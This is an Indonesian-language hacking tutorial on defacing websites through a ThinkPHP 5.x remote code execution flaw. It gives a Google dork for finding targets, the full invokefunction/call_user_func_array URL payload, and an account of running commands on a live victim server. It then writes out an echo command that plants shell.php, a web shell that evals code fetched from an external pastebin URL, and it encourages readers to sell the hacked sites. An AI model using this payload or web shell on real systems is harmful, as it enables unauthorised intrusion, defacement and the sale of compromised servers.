halloa kalian , kembali lagi ma wibu tampan satu ni😎👊 , ga tau w gabut ja liburan cuma rebahan tapi dollar ngalir terus xixixi , oke kali ini gw mau kasih tutor deface thinkPHP 5.xxx Remote code execution . oke ga usah banyak bicara lagi.
bahan :
- hp/lepi
- internet lah :vrot
- dork :
"index of/" + "LICENSE.txt" + "public" + "runtime"
( kembangin lagi pake otak bokep kalian )
oke kalian ngdork di google dulu ya kan xixi
oke pilih target nya yakan ekwk terus pilih salah satu target lalu tinggal kita exploit :vrot
exploit :
public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= enter your command
ex : localhost:8080/path/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= yur command
ya seperti itu cara menjalankan exploit nya
di sini saya sudah punya live target nya :'D mari kita exploit
disini gw masukin command uname -a jadi keliatan name server nya :D
oke next kita buat uploader pake command echo :
- echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/YNpriSQu"));?>' > shell.php
oke sudah ku buat uploader dan udah bisa ku akses juga shell ku wkwk,
oke terserah kalian mau kalian apain itu target wkwk :'v btw mending jual gan mayan $$$ aowkwowk
Ya sekian dari gw h3h3h3h3 , kurang lebih nya mon maap . Stay strong ailopyu all😃❤
